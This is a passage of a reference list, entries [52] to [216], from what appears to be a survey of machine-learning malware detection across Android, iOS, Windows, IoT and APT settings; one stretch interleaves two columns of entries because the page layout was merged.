[52] B. Kolosnjaji, A. Zarras, G. Webster, C. Eckert, Deep learning for classification of malware system call sequences, in: Proc. Australas. Joint Conf. Artif. Intell., Springer, Cham, Switzerland, 2016, pp. 137–149.
[53] E. Raff, et al., An investigation of byte n-gram features for malware classification, J. Comput. Virol. Hacking Tech. 14 (1) (2018) 1–20.
[54] H.S. Anderson, P. Roth, EMBER: An open dataset for training static PE malware machine learning models, 2018, https://arxiv.org/abs/1804.04637.
[55] https://arxiv.org/abs/1804.04637.
[56] https://www.unb.ca/cic/datasets/.
[57] https://www.sonicwall.com/2022-cyber-threat-report/sonicwall-cyber-threat-report-thank-you/.
[58] J. Saxe, K. Berlin, Deep neural network based malware detection using two dimensional binary program features, in: Proc. 10th Int. Conf. Malicious Unwanted Softw. (Malware), 2015, pp. 11–20.
[59] TaeGuen Kim, BooJoong Kang, Mina Rho, Sakir Sezer, Eul Gyu Im, A multimodal deep learning method for android malware detection using various features, IEEE Trans. Inf. Forensics Secur. http://dx.doi.org/10.1109/TIFS.2018.2866319.
[60] Zhiang Fang, Junfeng Wang, Boya Li, Siqi Wu, Yingjie Zhou, Haiying Huang, Evading Anti-Malware Engines with Deep Reinforcement Learning, Vol 7, IEEE, 2019, pp. 48867–48879.
[61] A. Damodaran, F. Di Troia, C.A. Visaggio, T.H. Austin, M. Stamp, A comparison of static, dynamic, and hybrid analysis for malware detection, J. Comput. Virol. Hacking Tech. 13 (1) (2017) 1–12.
[62] Wei Zhong, Feng Gu, A multi-level deep learning system for malware detection, Expert Syst. Appl. 133 (2019) 151–162.
[63] R. Vinayakumar, Mamoun Alazab, K.P. Soman, Prabaharan Poornachandran, Sitalakshmi Venkatraman, Robust intelligent malware detection using deep learning, IEEE Access 7 (2019) 46717–46738.
[64] M. Alazab, S. Venkatraman, P. Watters, M. Alazab, Zero-day malware detection based on supervised learning algorithms of API call signatures, in: Proc. 9th Australas. Data Mining Conf., Vol. 121, Australian Computer Society, Ballarat, Australia, 2011, pp. 171–182.
[65] Azmoodeh, Choo, Robust malware detection for internet of (battlefield) things devices using deep eigenspace learning, IEEE Trans. Sustain. Comput. (2018) http://dx.doi.org/10.1109/TSUSC.2018.2809665.
[66] L. Nataraj, A Signal Processing Approach to Malware Analysis, Univ. California, Santa Barbara, CA, USA, 2015.
[67] L. Nataraj, B.S. Manjunath, SPAM: Signal processing to analyze malware, 2016, [Online]. Available: https://arxiv.org/abs/1605.05280.
[68] L. Nataraj, D. Kirat, B.S. Manjunath, G. Vigna, Sarvam: Search and retrieval of malware, in: Proc. Annu. Comput. Secur. Conf. (ACSAC) Workshop Next Gener. Malware Attacks Defence, NGMAD, 2013, pp. 1–9.


[69] L. Nataraj, V. Yegneswaran, P. Porras, J. Zhang, A comparative assessment of malware classification using binary texture analysis and dynamic analysis, in: Proc. 4th ACM Workshop Secur. Artif. Intell., ACM, New York, NY, USA, pp. 21–30.
[70] L. Nataraj, G. Jacob, B.S. Manjunath, Detecting Packed Executables Based on Raw Binary Data, Tech. Rep., Univ. California, Santa Barbara, CA, USA, 2010.
[71] M. Farrokhmanesh, A. Hamzeh, A novel method for malware detection using audio signal processing techniques, in: Proc. Artif. Intell. Robot., IRANOPEN, 2016, pp. 85–91.
[72] D. Kirat, L. Nataraj, G. Vigna, B.S. Manjunath, SigMal: A static signal processing based malware triage, in: Proc. 29th Annu. Comput. Secur. Appl. Conf., ACM, New York, NY, USA, 2013, pp. 89–98.
[73] Yongkang Jiang, Shenghong Li, Yue Wu, Futai Zou, A novel image-based malware classification model using deep learning, in: 26th International Conference, ICONIP 2019 Sydney, NSW, Australia, December 12–15, 2019 Proceedings, Part II.
[74] D. Gibert, J. Béjar, C. Mateu, J. Planes, D. Solis, R. Vicens, Convolutional neural networks for classification of malware assembly code, in: Recent Advances in Artificial Intelligence Research and Development - Proceedings of the 20th International Conference of the Catalan Association for Artificial Intelligence, Deltebre, Terres de l'Ebre, Spain, October 25-27, 2017, 2017, pp. 221–226.
[75] D. Gibert, C. Mateu, J. Planes, An end-to-end deep learning architecture for classification of malware's binary content, in: V. Kůrková, Y. Manolopoulos, B. Hammer, L. Iliadis, I. Maglogiannis (Eds.), Artificial Neural Networks and Machine Learning ICANN 2018, Springer International Publishing, Cham, 2018, pp. 383–391.
[76] K. Kosmidis, C. Kalloniatis, Machine learning and images for malware detection and classification, 2017.
[77] D. Gibert, C. Mateu, J. Planes, R. Vicens, Using convolutional neural networks for classification of malware represented as images, J. Comput. Virol. Hacking Tech. (2018).
[78] D. Gibert, C. Mateu, J. Planes, R. Vicens, Classification of malware by using structural entropy on convolutional neural networks, in: IAAI Conference on Artificial Intelligence, 2018b, pp. 7759–7764.
[79] M. Dib, S. Torabi, E. Bou-Harb, C. Assi, A multi-dimensional deep learning framework for IoT malware classification and family attribution, IEEE Trans. Netw. Serv. Manag. 18 (2) (2021) 1165–1177.
[80] G.E. Dahl, J.W. Stokes, L. Deng, D. Yu, Large-scale malware classification using random projections and neural networks, in: 2013 IEEE International Conference on Acoustics, Speech and Signal Processing, 2013, pp. 3422–3426.
[81] Z. Yuan, Y. Lu, Z. Wang, Y. Xue, Droid sec: Deep learning in Android malware detection, ACM SIGCOMM Comput. Commun. Rev. 44 (4) (2014) 371–372.
[82] Y. Bengio, Learning deep architectures for AI, Found. Trends Mach. Learn. 2 (1) (2009) 1–127.
[83] Y. LeCun, Y. Bengio, et al., Convolutional networks for images, speech, and time series, Handb. Brain Theory Neural Netw. 3361 (10) (1995) 1995.
[84] A. Krizhevsky, I. Sutskever, G.E. Hinton, Imagenet classification with deep convolutional neural networks, in: Advances in Neural Information Processing Systems, 2012, pp. 1097–1105.
[85] Quan Le, Oisín Boydell, Brian Mac Namee, Mark Scanlon, Deep learning at the shallow end: Malware classification for non-domain experts, Digit. Investig. 26 (2018) S118–S126, Proceedings of the Eighteenth Annual DFRWS USA.
[86] S. Hochreiter, J. Schmidhuber, Long short-term memory, Neural Comput. 9 (8) (1997) 1735–1780.
[87] B. Athiwaratkun, J.W. Stokes, Malware classification with lstm and gru language models and a character-level CNN, in: 2017 IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP, 2017, pp. 2482–2486.
[88] C. Yin, Y. Zhu, J. Fei, X. He, A deep learning approach for intrusion detection using recurrent neural networks, IEEE Access 5 (2017) 21954–21961.
[89] V.V. Strelkov, A new similarity measure for histogram comparison and its application in time series analysis, Pattern Recognit. Lett. 29 (13) (2008) 1768–1774.
[90] B. Kang, H.S. Kim, T. Kim, et al., Fast malware family detection method using control flow graphs, in: Proceedings of 2011 ACM Symposium on Research in Applied Computation, ACM, 2011, pp. 287–292.
[91] L.E. Gonzalez, R.A. Vazquez, Malware classification using euclidean distance and artificial neural networks, in: 2013 12th Mexican International Conference on Artificial Intelligence, MICAI, IEEE, 2013, pp. 103–108.
[92] C. Annachhatre, T.H. Austin, M. Stamp, Hidden Markov models for malware classification, J. Comput. Virol. Hacking Tech. 11 (2) (2015) 59–73.
[93] K.S. Han, J.H. Lim, B. Kang, et al., Malware analysis using visualized images and entropy graphs, Int. J. Inf. Secur. 14 (1) (2015) 1–14.
[94] M.M. Alani, A.I. Awad, PAIRED: An explainable lightweight android malware detection system, IEEE Access 10 (2022) 73214–73228.
[95] K. Rieck, P. Trinius, C. Willems, T. Holz, Automatic analysis of malware behavior using machine learning, J. Comput. Secur. 19 (4) (2011) 639–668.
[96] S. Rasthofer, S. Arzt, E. Bodden, A machine-learning approach for classifying and categorizing android sources and sinks, in: Proceedings of the Network and Distributed System Security Symposium, 2014, pp. 23–26.
[97] G. Schwenk, K. Rieck, Adaptive detection of covert communication in HTTP requests, in: Proceedings of the 7th European Conference on Comput. Netw. Defence (EC2ND'11), 2011, pp. 25–32.
[98] N. Nissim, Y. Lapidot, A. Cohen, Y. Elovici, Trusted system-calls analysis methodology aimed at detection of compromised virtual machines using sequential mining, Knowl.-Based Syst. 153 (2018) 147–175.
[99] G. Hospodar, B. Gierlichs, E. De Mulder, I. Verbauwhede, J. Vandewalle, Machine learning in side-channel analysis: A first study, J. Cryptogr. Eng. 1 (4) (2011) 293–302.
[100] J. Demme, et al., On the feasibility of online malware detection with performance counters, ACM SIGARCH Comput. Archit. News 41 (3) (2013) 559.
[101] A. Nazari, N. Sehatbakhsh, M. Alam, A. Zajic, M. Prvulovic, EDDIE: EM-based detection of deviations in program execution, in: Proceedings of the 44th Annual International Symposium on Computer Architecture, ISCA'17, 2017, pp. 333–346.
[102] T.N. Nguyen, Q.-D. Ngo, H.-T. Nguyen, G.L. Nguyen, An advanced computing approach for IoT-botnet detection in industrial internet of things, IEEE Trans. Ind. Inform. 18 (11) (2022) 8298–8306.
[103] M.’. Husainiamer, M.M. Saudi, A. Ahmad, Classification for iOS mobile malware inspired by phylogenetic: Proof of concept, in: 2020 IEEE Conference on Open Systems, ICOS, 2020, pp. 59–63.
[104] J. Jeon, J.H. Park, Y. Jeong, Dynamic analysis for IoT malware detection with convolution neural network model, IEEE Access 8 (2020) 96899–96911.
[105] A. Pektaş, T. Acarman, Classification of malware families based on runtime behaviors, J. Inf. Secur. Appl. 37 (2017) 91–100.
[106] Microsoft: SAM cybersecurity engagement kit, Internet (2018) https://assets.microsoft.com/en-nz/cybersecurity-sam-engagement-kit.pdf.
[107] Y. Ye, T. Li, D.A. Adjeroh, S.S. Iyengar, A survey on Malware detection using data mining techniques, ACM Comput. Surv. 50 (3) (2017) 41.
[108] L. Nataraj, S. Karthikeyan, G. Jacob, B.S. Manjunath, Malware images: Visualization and automatic classification, in: Proc. 8th Int. Symp. Vis. Cyber Secur., ACM, New York, NY, USA, 2011, p. 4.
[109] J. Yan, Y. Qi, Q. Rao, Detecting malware with an ensemble method based on deep neural network, Secur. Commun. Netw. 16 (2018).
[110] T.M. Kebede, O. Djaneye-Boundjou, B.N. Narayanan, A. Ralescu, D. Kapp, Classification of malware programs using autoencoders based deep learning architecture and its application to the Microsoft Malware classification challenge (big 2015) dataset, in: 2017 IEEE National Aerospace and Electronics Conference, NAECON, IEEE, 2017, pp. 70–75.
[111] H.-J. Kim, Image-based malware classification using convolutional neural network, in: J.J. Park, V. Loia, G. Yi, Y. Sung (Eds.), CUTE/CSA-2017, in: LNEE, vol. 474, Springer, Singapore, 2018, pp. 1352–1357.
[112] F.C.C. Garcia, F.P. Muga, Random forest for malware classification, Cryptogr. Secur. (2016) arXiv.
[113] E. Raff, C. Nicholas, An alternative to NCD for large sequences, Lempel–Ziv Jaccard distance, in: Proceedings of the 23rd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, ACM, 2017, pp. 1007–1015.
[114] J. Drew, M. Hahsler, T. Moore, Polymorphic malware detection using sequence classification methods and ensembles, EURASIP J. Inf. Secur. 2 (1) (2017).
[115] Digital: Trends, 2011, https://www.digitaltrends.com/android/smartphone-sales-exceed-those-of-pcs-for-first-time-applesmashes-record/.
[116] M.G. Ciobanu, F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, A data life cycle modeling proposal by means of formal methods, in: Proceedings of the 2019 ACM Asia Conference on Computer and Communications Security, ACM, 2019, pp. 670–672.
[117] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Energy consumption metrics for mobile device dynamic malware detection, Procedia Comput. Sci. 159 (2019) 1045–1052.
[118] F. Martinelli, F. Mercaldo, A. Santone, Social network polluting contents detection through deep learning techniques, in: 2019 International Joint Conference on Neural Networks, IJCNN, IEEE, 2019, pp. 1–10.
[119] X. Xiao, S. Zhang, F. Mercaldo, G. Hu, A.K. Sangaiah, Android malware detection based on system call sequences and LSTM, Multimedia Tools Appl. 78 (4) (2019) 3979–3999.


[120] V. Rastogi, Y. Chen, X. Jiang, Catch me if you can: evaluating android anti- [145] F. Martinelli, F. Mercaldo, A. Saracino, Bridemaid: An hybrid tool for
malware against transformation attacks, IEEE Trans. Inf. Forensics Secur. accurate detection of android malware, in: Proceedings of the 2017 ACM
9 (1) (2014) 99–108. on Asia Conference on Computer and Communications Security, ACM,
[121] X. Jiang, Y. Zhou, Dissecting android malware: characterization and 2017, pp. 899–901.
evolution, in: 2012 IEEE Symposium on Security and Privacy, IEEE, 2012, [146] A. Shabtai, U. Kanonov, Y. Elovici, C. Glezer, Y. Weiss, Andromaly : a
pp. 95–109. behavioral malware detection framework for android devices, J. Intell.
[122] G. Canfora, F. Martinelli, F. Mercaldo, V. Nardone, A. Santone, C.A. Inf. Syst. 38 (1) (2012) 161–190.
Visaggio, Leila: formal tool for identifying mobile malicious behaviour, [147] T. Blasing, A.D. Schmidt, L. Batyuk, S.A. Camtepe, S. Albayrak, An an-
IEEE Trans. Softw. Eng. 45 (12) (2018) 1230–1252. droid application sandbox system for suspicious software detection, in:
[123] Google: Play, 2015, https://play.google.com/store. Proceedings of 5th International Conference on Malicious and Unwanted
[124] Apk: Tool, 2018, https://ibotpeaches.github.io/Apktool/. Software, 2010.
[125] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Investigating mobile [148] B. Dixon, Y. Jiang, A. Jaiantilal, S. Mishra, Location based power analysis
applications quality in official and third-party marketplaces, in: Pro- to detect malicious code in smartphones, in: Proceedings of the 1st ACM
ceedings of the 14th International Conference on Evaluation of Novel Workshop on Security and Privacy in Smartphones and Mobile Devices,
Approaches to Software Engineering, SCITEPRESS-Science and Technology 2011.
Publications, Lda, 2019, pp. 169–178. [149] M. Polino, A. Scorti, F. Maggi, S. Zanero, Jackdaw: Towards automatic
[126] F. Fasano, F. Martinelli, F. Mercaldo, A. Santone, Measuring mobile reverse engineering of large datasets of binaries, in: International Con-
applications quality and security in higher education, in: 2018 IEEE ference on Detection of Intrusions and Malware, and Vulnerability
International Conference on Big Data (Big Data), IEEE, 2018, pp. Assessment, Springer, 2015, pp. 121–143.
5319–5321. [150] W. Enck, P. Gilbert, S. Han, V. Tendulkar, B.G. Chun, L.P. Cox, J. Jung, P.
[127] M. Scalas, D. Maiorca, F. Mercaldo, C.A. Visaggio, F. Martinelli, G. Giac- McDaniel, A.N. Sheth, Taintdroid: an information-flow tracking system for
into, On the effectiveness of system API-related information for android realtime privacy monitoring on smartphones, ACM Trans. Comput. Syst.
ransomware detection, Comput. Secur. 86 (2019) 168–182. (TOCS) 32 (2) (2014) 5.
[128] Ah: Myth, 2018, https://github.com/AhMyth/AhMyth-Android-RAT. [151] A. Shabtai, U. Kanonov, Y. Elovici, Intrusion detection for mobile devices
[129] Droid: Jack, 2018, http://droidjack.net/. using the knowledge-based, temporal abstraction method, J. Syst. Softw.
[130] F. Martinelli, F. Mercaldo, V. Nardone, A. Santone, A.K. Sangaiah, A. 83 (8) (2010) 1524–1537.
Cimitile, Evaluating model checking for cyber threats code obfuscation [152] Y. Zhou, Z. Wang, W. Zhou, X. Jiang, Hey, you, get off of my market:
identification, J. Parallel Distrib. Comput. 119 (2018) 203–218. detecting malicious apps in official and alternative android markets, in:
[131] J. Oberheide, C. Mille, Dissecting the android bouncer, in: SummerCon, Proceedings of the Network and Distributed System Security Symposium,
2012. NDSS, 2012.
[132] F. Mercaldo, V. Nardone, A. Santone, Ransomware inside out, in: 2016 [153] C. Zheng, S. Zhu, S. Dai, G. Gu, X. Gong, X. Han, W. Zou, Smartdroid:
11th International Conference on Availability, Reliability and Security, an automatic system for revealing UI-based trigger conditions in android
ARES, IEEE, 2016, pp. 628–637. applications, in: Proceedings of the 2nd ACMWorkshop on Security and
[133] F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Hey malware, i can Privacy in Smartphones and Mobile Devices, SPSM, New York, NY, USA,
find you!, in: 2016 IEEE 25th International Conference on Enabling 2012, pp. 93–104.
Technologies: Infrastructure for Collaborative Enterprises, WETICE, IEEE, [154] M. Lindorfer, M. Neugschwandtner, L. Weichselbaum, Y. Fratantonio, V.
2016, pp. 261–262. van der Veen, C. Platzer, Andrubis-1, 000, 000 apps later: a view on
[134] T. Petsas, G. Voyatzis, E. Athanasopoulos, M. Polychronakis, S. Ioannidis, current android malware behaviors, in: Proceedings of the 3rd Interna-
Rage against the virtual machine: hindering dynamic analysis of android tional Workshop on Building Analysis Datasets and Gathering Experience
malware, in: Proceedings of the Seventh European Workshop on System Returns for Security, BADGERS, 2014.
Security, ACM, 2014, p. 5.
[135] Asma Razgallah, Raphaël Khoury, Sylvain Hallé, Kobra Khanmohammadi, A survey of malware detection in Android apps: Recommendations and perspectives for future research, Comp. Sci. Rev. (ISSN: 1574-0137) 39 (2021) 100358.
[136] Shivi Garg, Niyati Baliyan, Comparative analysis of android and iOS from security viewpoint, Comp. Sci. Rev. (ISSN: 1574-0137) 40 (2021) 100372.
[137] G. Canfora, F. Mercaldo, C.A. Visaggio, A classifier of malicious android applications, in: Proceedings of the 2nd International Workshop on Security of Mobile Applications, in Conjunction with the International Conference on Availability, Reliability and Security, 2013.
[138] A. Cimitile, F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Talos: no more ransomware victims with formal methods, Int. J. Inf. Secur. 17 (2017) 1–20.
[139] G. Canfora, A. Di Sorbo, F. Mercaldo, C.A. Visaggio, Obfuscation techniques against signature-based detection: a case study, in: 2015 Mobile Systems Technologies Workshop, MST, IEEE, 2015, pp. 21–26.
[140] F. Mercaldo, V. Nardone, A. Santone, C.A. Visaggio, Ransomware steals your phone. formal methods rescue it, in: International Conference on Formal Techniques for Distributed Objects, Components, and Systems, Springer, 2016, pp. 212–221.
[141] D. Octeau, P. McDaniel, S. Jha, A. Bartel, E. Bodden, J. Klein, Y. Le Traon, Effective inter-component communication mapping in android: an essential step towards holistic security analysis, in: Presented as Part of the 22nd USENIX Security Symposium (USENIX Security 13), 2013, pp. 543–558.
[142] S. Arzt, S. Rasthofer, C. Fritz, E. Bodden, A. Bartel, J. Klein, Y. Le Traon, D. Octeau, P. McDaniel, Flowdroid: precise context, flow, field, object-sensitive and lifecycle-aware taint analysis for android apps, ACM SIGPLAN Not. 49 (6) (2014) 259–269.
[143] M. Lindorfer, M. Neugschwandtner, C. Platzer, Marvin: Efficient and comprehensive mobile app classification through static and dynamic analysis, in: 2015 IEEE 39th Annual Computer Software and Applications Conference (COMPSAC), Vol. 2, IEEE, 2015, pp. 422–433.
[144] M. Faiella, A. LaMarra, F. Martinelli, F. Mercaldo, A. Saracino, M. Sheikhalishahi, A distributed framework for collaborative and dynamic analysis of android malware, in: 2017 25th Euromicro International Conference on Parallel, Distributed and Network-Based Processing, PDP, IEEE, 2017, pp. 321–328.
[155] M. Spreitzenbarth, T. Schreck, F. Echtler, D. Arp, J. Hoffmann, Mobile-sandbox: combining static and dynamic analysis with machine-learning techniques, Int. J. Inf. Secur. 14 (2014) 141–153.
[156] A. Ferrante, E. Medvet, F. Mercaldo, J. Milosevic, C.A. Visaggio, Spotting the malicious moment: Characterizing malware behavior using dynamic features, in: 2016 11th International Conference on Availability, Reliability and Security, ARES, IEEE, 2016, pp. 372–381.
[157] H. Hashemi, A. Hamzeh, Visual malware detection using local malicious pattern, J. Comput. Virol. Hacking Tech. 15 (1) (2019) 1–14.
[158] M. Farrokhmanesh, A. Hamzeh, Music classification as a new approach for malware detection, J. Comput. Virol. Hacking Tech. 15 (2) (2019) 77–96.
[159] H. Rathore, S.K. Sahay, Towards robust android malware detection models using adversarial learning, in: 2021 IEEE International Conference on Pervasive Computing and Communications Workshops and other Affiliated Events (PerCom Workshops), 2021, pp. 424–425.
[160] R. Surendran, T. Thomas, S. Emmanuel, On existence of common malicious system call codes in android malware families, IEEE Trans. Reliab. 70 (1) (2021) 248–260.
[161] Y. Hei, et al., Hawk: Rapid android malware detection through heterogeneous graph attention networks, IEEE Trans. Neural Netw. Learn. Syst. http://dx.doi.org/10.1109/TNNLS.2021.3105617.
[162] H. Bai, N. Xie, X. Di, Q. Ye, FAMD: A fast multifeature android malware detection framework, design, and implementation, IEEE Access 8 (2020) 194729–194740.
[163] Han Gao, Shaoyin Cheng, Weiming Zhang, GDroid: Android malware detection and classification with graph convolutional network, Comput. Secur. (ISSN: 0167-4048) 106 (2021) 102264.
[164] Satheesh Kumar Sasidharan, Ciza Thomas, ProDroid — An android malware detection framework based on profile hidden Markov model, Pervasive Mob. Comput. (ISSN: 1574-1192) 72 (2021) 101336.
[165] J. Xu, Y. Li, R.H. Deng, K. Xu, SDAC: A slow-aging solution for android malware detection using semantic distance based API clustering, IEEE Trans. Dependable Secure Comput. 19 (2) (2022) 1149–1163.
[166] Shaojie Yang, Yongjun Wang, Haoran Xu, Fangliang Xu, Mantun Chen, An android malware detection and classification approach based on contrastive learning, Comput. Secur. (ISSN: 0167-4048) 123 (2022) 102915.


[167] S. Seraj, S. Khodambashi, M. Pavlidis, et al., HamDroid: permission-based harmful android anti-malware detection using neural networks, Neural Comput. Appl. 34 (2022) 15165–15174.
[168] Hui-juan Zhu, Wei Gu, Liang-min Wang, Zhi-cheng Xu, Victor S. Sheng, Android malware detection based on multi-head squeeze-and-excitation residual network, Expert Syst. Appl. (ISSN: 0957-4174) 212 (2023) 118705.
[169] Shannon Williams, Mobile Malware and Exploitation Amongst Biggest Cyber Threats for 2020, Security Brief Asia, 2020, [online] Available: https://securitybrief.asia/story/mobile-malware-and-exploitation-amongst-biggest-cyber-threats-for-2020.
[170] Swati Khandelwal, ‘Exodus’ Surveillance Malware Found Targeting Apple iOS Users, The Hacker News, 2019, [online] Available: https://thehackernews.com/2019/04/exodus-ios-malware.html.
[171] Swati Khandelwal, Powerful FinSpy Spyware Found Targeting iOS and Android Users in Myanmar, 2019.
[172] D. Damopoulos, G. Kambourakis, S. Gritzalis, iSAM: an iPhone stealth airborne malware, in: IFIP International Information Security Conference, Springer, 2011, pp. 17–28.
[173] L. García, R.J. Rodríguez, A peek under the hood of iOS malware, in: 2016 10th International Conference on Availability, Reliability and Security, ARES, 2016.
[174] A. Cimitile, F. Martinelli, F. Mercaldo, Machine learning meets iOS malware: Identifying malicious applications on apple environment, in: ICISSP, 2017, pp. 487–492.
[175] M. Szydlowski, M. Egele, C. Kruegel, G. Vigna, Challenges for dynamic analysis of iOS applications, in: Open Problems in Network Security, Springer, 2012, pp. 65–77.
[176] M. Lindorfer, B. Miller, M. Neugschwandtner, C. Platzer, Take a bite - finding the worm in the apple, in: 2013 9th International Conference on Information, Communications and Signal Processing, ICICS, IEEE, 2013, pp. 1–5.
[177] H.H. Pajouh, A. Dehghantanha, R. Khayami, et al., Intelligent OS X malware threat detection with code inspection, J. Comput. Virol. Hacking Tech. 14 (2018) 213–223.
[178] S. Bojjagani, V.N. Sastry, VAPTAi: A threat model for vulnerability assessment and penetration testing of android and iOS mobile banking apps, in: 2017 IEEE 3rd International Conference on Collaboration and Internet Computing, CIC, 2017, pp. 77–86.
[179] G. Zhou, M. Duan, Q. Xi, H. Wu, ChanDet: Detection model for potential channel of iOS applications, J. Phys. Conf. Ser. 1187 (4) (2019).
[180] Y. Lee, X. Wang, X. Liao, X. Wang, Understanding illicit UI in iOS apps through hidden UI analysis, IEEE Trans. Dependable Secure Comput. 18 (5) (2021) 2390–2402.
[181] Nir Nissim, et al., Novel active learning methods for enhanced PC malware detection in windows OS, Expert Syst. Appl. 41 (13) (2014) 5843–5857.
[182] P.V. Shijo, A. Salim, Integrated static and dynamic analysis for malware detection, Procedia Comput. Sci. 46 (2015) 804–811.
[183] Gandeva B. Satrya, Niken D.W. Cahyani, Ritchie F. Andreta, The detection of 8 type malware botnet using hybrid malware analysis in executable file windows operating systems, in: Proceedings of the 17th International Conference on Electronic Commerce 2015, ACM, 2015, p. 5.
[184] Tulika Mithal, Kshitij Shah, Dushyant Kumar Singh, Case studies on intelligent approaches for static malware analysis, in: Emerging Research in Computing, Information, Communication and Applications, Springer, Singapore, 2016, pp. 555–567.
[185] Bander Alsulami, et al., Lightweight behavioral malware detection for windows platforms, in: 2017 12th International Conference on Malicious and Unwanted Software, MALWARE, IEEE, 2017, pp. 75–81.
[186] Shamsul Huda, et al., A hybrid-multi filter-wrapper framework to identify run-time behaviour for fast malware detection, Future Gener. Comput. Syst. 83 (2018) 193–207.
[187] H. Kim, J. Smith, K.G. Shin, Detecting energy-greedy anomalies and mobile malware variants, in: Proceedings of the 6th International Conference on Mobile Systems, Applications, and Services, 2008.
[188] S. Dija, J. Ajana, V. Indu, M. Sabarinath, Cyber forensics: Discovering traces of malware on windows systems, in: 2020 IEEE Recent Advances in Intelligent Computational Systems, RAICS, 2020, pp. 141–146.
[189] R. Yang, et al., RATScope: Recording and reconstructing missing RAT semantic behaviors for forensic analysis on windows, IEEE Trans. Dependable Secure Comput. http://dx.doi.org/10.1109/TDSC.2020.3032570.
[190] S. Yousefi, F. Derakhshan, H. Karimipour, H.S. Aghdasi, An efficient route planning model for mobile agents on the internet of things using Markov decision process, Ad Hoc Netw. 98 (2020) 102053.
[191] M. Al-Asli, T.A. Ghaleb, Review of signature-based techniques in antivirus products, in: 2019 International Conference on Computer and Information Sciences, ICCIS, IEEE, 2019, pp. 1–6.
[192] H.H. Pajouh, R. Javidan, R. Khayami, A. Dehghantanha, K.K.R. Choo, A two-layer dimension reduction and two-tier classification model for anomaly-based intrusion detection in IoT backbone networks, IEEE Trans. Emerg. Top. Comput. 7 (2) (2019) 314–323.
[193] S. Sharmeen, S. Huda, J.H. Abawajy, W. Nagy Ismail, M.M. Hassan, Malware threats and detection for industrial mobile-IoT networks, IEEE Access 6 (2018) 15941–15957.
[194] A. Lohachab, B. Karambir, L.A. Lohachab, Critical analysis of ddos-an emerging security threat over IoT networks, J. Commun. Inf. Netw. 3 (3) (2018) 57–78.
[195] J. Su, V. Danilo Vasconcellos, S. Prasad, S. Daniele, Y. Feng, K. Sakurai, Lightweight classification of IoT malware based on image recognition, in: 2018 IEEE 42nd Annual Computer Software and Applications Conference, COMPSAC, Tokyo, 2018, pp. 664–669.
[196] S. Papafotikas, A. Kakarountas, A machine-learning clustering approach for intrusion detection to IoT devices, in: 2019 4th South-East Europe Design Automation, Computer Engineering, Computer Networks and Social Media Conference (SEEDA-CECNSM), IEEE, 2019, pp. 1–6.
[197] L. Xiao, X. Wan, X. Lu, Y. Zhang, D. Wu, IoT security techniques based on machine learning: how do IoT devices use AI to enhance security? IEEE Signal Process. Mag. 35 (5) (2018) 41–49.
[198] Y.-T. Lee, et al., Cross platform IoT-malware family classification based on printable strings, in: 2020 IEEE 19th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom), 2020, pp. 775–784.
[199] S.M.P. Dinakarrao, et al., Cognitive and scalable technique for securing IoT networks against malware epidemics, IEEE Access 8 (2020) 138508–138528.
[200] M.N. Aman, U. Javaid, B. Sikdar, IoT-Proctor: A secure and lightweight device patching framework for mitigating malware spread in IoT networks, IEEE Syst. J. http://dx.doi.org/10.1109/JSYST.2021.3070404.
[201] T. Trajanovski, N. Zhang, An automated and comprehensive framework for IoT botnet detection and analysis (IoT-BDA), IEEE Access 9 (2021) 124360–124383.
[202] J. Bhayo, R. Jafaq, A. Ahmed, S. Hameed, S.A. Shah, A time-efficient approach toward ddos attack detection in IoT network using SDN, IEEE Internet Things J. 9 (5) (2022) 3612–3630.
[203] R. Kalakoti, S. Nõmm, H. Bahsi, In-depth feature selection for the statistical machine learning-based botnet detection in IoT networks, IEEE Access 10 (2022) 94518–94535.
[204] A. Azmoodeh, A. Dehghantanha, M. Conti, K.K.R. Choo, Detecting crypto-ransomware in IoT networks based on energy consumption footprint, J. Ambient Intell. Humaniz. Comput. 9 (4) (2018) 1141–1152.
[205] I. Ghafir, et al., Detection of advanced persistent threat using machine-learning correlation analysis, 89 (2018) 349–359.
[206] S.T. Liu, Y.M. Chen, S.J. Lin, A novel search engine to uncover potential victims for APT investigations, in: C.-H. Hsu, X. Li, X. Shi, R. Zheng (Eds.), NPC 2013, in: LNCS, vol. 8147, Springer, Heidelberg, 2013, pp. 405–416.
[207] M. Balduzzi, V. Ciangaglini, R. McArdle, Targeted attacks detection with spunge, in: 2013 Eleventh Annual Conference on Privacy, Security and Trust, IEEE, 2013, pp. 185–194.
[208] Z. Ma, Q. Li, X. Meng, Discovering suspicious APT families through a large-scale domain graph in information-centric IoT, IEEE Access 7 (2019) 13917–13926.
[209] X. Liu, L. Li, Z. Ma, X. Lin, J. Cao, Design of APT attack defence system based on dynamic deception, in: 2019 IEEE 5th International Conference on Computer and Communications, ICCC, Chengdu, China, 2019, pp. 1655–1659.
[210] H. Sun, C. Shen, C. Weng, A flexible framework for malicious open XML document detection based on APT attacks, in: IEEE INFOCOM 2019 - IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS), Paris, France, 2019, pp. 2005–2006.
[211] R. Coulter, J. Zhang, L. Pan, Y. Xiang, Unmasking windows advanced persistent threat execution, in: 2020 IEEE 19th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom), 2020, pp. 268–276.
[212] Y. Su, Research on APT attack based on game model, in: 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control Conference, ITNEC, 2020, pp. 295–299.
[213] W. Alghamdi, M. Schukat, Practical implementation of APTs on PTP time synchronisation networks, in: 2020 31st Irish Signals and Systems Conference, ISSC, 2020, pp. 1–5.
[214] Y. Qi, R. Jiang, Y. Jia, A. Li, An APT attack analysis framework based on self-define rules and mapreduce, in: 2020 IEEE Fifth International Conference on Data Science in Cyberspace, DSC, 2020, pp. 61–66.
[215] S.-P. Hong, C.-H. Lim, H.J. Lee, APT attack response system through AM-HIDS, in: 2021 23rd International Conference on Advanced Communication Technology, ICACT, 2021, pp. 271–274.


[216] L.-X. Yang, K. Huang, X. Yang, Y. Zhang, Y. Xiang, Y.Y. Tang, Defence against advanced persistent threat through data backup and recovery, IEEE Trans. Netw. Sci. Eng. 8 (3) (2021) 2001–2013.
